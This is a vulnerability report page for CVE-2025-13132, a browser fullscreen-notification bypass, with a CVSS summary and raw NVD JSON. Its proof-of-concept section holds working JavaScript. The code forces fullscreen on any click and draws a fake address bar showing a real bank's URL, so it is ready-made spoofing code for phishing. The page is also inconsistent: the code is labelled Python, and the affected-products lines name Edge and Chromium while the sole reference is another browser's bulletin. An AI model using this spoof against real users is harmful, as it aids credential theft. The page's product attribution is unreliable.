Security Vulnerability Report
中文
CVE-2025-13132 CVSS 7.4 HIGH

CVE-2025-13132

Published: 2025-11-21 18:15:49
Last Modified: 2026-04-15 00:35:42
Source: 59469e6c-7ea7-446f-8e43-06aa32c115e8

Description

This vulnerability allowed a site to enter fullscreen, after a user click, without a full-screen notification (toast) appearing. Without this notification, users could potentially be misled about what site they were on if a malicious site renders a fake UI (like a fake address bar.)

CVSS Details

CVSS Score
7.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Edge浏览器 < 受影响版本
基于Chromium的浏览器(受影响版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-13132 PoC - Fullscreen Notification Bypass // This PoC demonstrates the fullscreen notification bypass vulnerability // Method to trigger fullscreen without proper notification async function triggerFullscreenBypass() { try { // Request fullscreen on user click await document.documentElement.requestFullscreen(); // After entering fullscreen, render fake browser UI setTimeout(() => { renderFakeBrowserUI(); }, 100); } catch (error) { console.log('Fullscreen request failed:', error); } } // Render fake browser UI to deceive users function renderFakeBrowserUI() { const fakeUI = document.createElement('div'); fakeUI.id = 'fake-browser-ui'; fakeUI.innerHTML = ` <div style=" position: fixed; top: 0; left: 0; right: 0; height: 40px; background: #f0f0f0; border-bottom: 1px solid #ccc; display: flex; align-items: center; padding: 0 10px; z-index: 999999; font-family: Arial, sans-serif; font-size: 13px; "> <div style="display:flex; gap:8px; margin-right:15px;"> <span style="color:#ea4335">●</span> <span style="color:#fbbc05">●</span> <span style="color:#34a853">●</span> </div> <div style=" flex: 1; background: white; border: 1px solid #ddd; border-radius: 4px; padding: 4px 10px; color: #666; ">https://www.bankofchina.com</div> </div> `; document.body.appendChild(fakeUI); } // Attach click listener to trigger document.addEventListener('click', triggerFullscreenBypass); console.log('CVE-2025-13132 PoC loaded - Click anywhere to trigger fullscreen bypass');

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13132", "sourceIdentifier": "59469e6c-7ea7-446f-8e43-06aa32c115e8", "published": "2025-11-21T18:15:48.813", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "This vulnerability allowed a site to enter fullscreen, after a user click, without a full-screen notification (toast) appearing. Without this notification, users could potentially be misled about what site they were on if a malicious site renders a fake UI (like a fake address bar.)"}], "metrics": {"cvssMetricV31": [{"source": "59469e6c-7ea7-446f-8e43-06aa32c115e8", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.0}]}, "weaknesses": [{"source": "59469e6c-7ea7-446f-8e43-06aa32c115e8", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1021"}]}], "references": [{"url": "https://www.diabrowser.com/security/bulletins#CVE-2025-13132", "source": "59469e6c-7ea7-446f-8e43-06aa32c115e8"}]}}